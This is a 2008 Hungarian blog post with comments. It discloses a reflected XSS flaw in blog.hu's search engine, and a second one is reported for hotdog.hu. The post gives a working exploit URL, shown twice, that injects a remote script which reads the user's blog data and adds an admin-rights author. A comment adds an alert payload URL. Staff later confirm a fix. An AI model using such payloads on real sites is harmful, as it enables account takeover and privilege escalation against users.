Darkelf talált egy nem-perzisztens XSS hibát a blog.hu keresőmotorjában. Mint tudjuk, az ilyen jellegű hiányosságok alap esetben nem jelentenek komoly veszélyt egy oldalra nézve, bár pl. egy phishing akció lebonyolításához kiválóan használhatók. Darkelf viszont kicsit továbbgonolta a dolgot, és írt egy ügyes kis szkriptet, ami egy aktív sessionben futtatva kiolvas néhány alapvető információt a felhasználó blogjaiból, valamint felvesz egy úgy adminisztrátori jogosultságú szerzőt is. Az alábbi linket követve tesztelhető a cucc:
http://blog.hu/index.php?posts=15&sentence=OR&s="><script src=https://m.blog.hu/ez/eznemegy/xss.txt> </script>&x=11&y=13
A hiba a keresőkifejezés megfelelő szűrésével orvosolható!
http://blog.hu/index.php?posts=15&sentence=OR&s="><script src=https://m.blog.hu/ez/eznemegy/xss.txt> </script>&x=11&y=13
A hiba a keresőkifejezés megfelelő szűrésével orvosolható!
[chips] 2008.03.24. 11:25:32
amúgy a hotdog.hu keresőjében is van egy primitív non-persistent XSS sebezhetőség. péladul:
hxxp://www.hotdog.hu/search/user_search_list.hot?new=1&src_name=%22%3E%20%3Cscript%3Ealert(%22Lorem%20ipsum%20dolor%20sit%20amet...%22);%3C/script%3E%20&src_login=
[chips] 2008.03.24. 11:32:35
mg 2008.03.24. 13:39:48
darkelf
joco 2008.03.25. 13:00:59
A keresőmotorban levő xss sebezhetőséget javítottuk, a másikon még dolgozunk.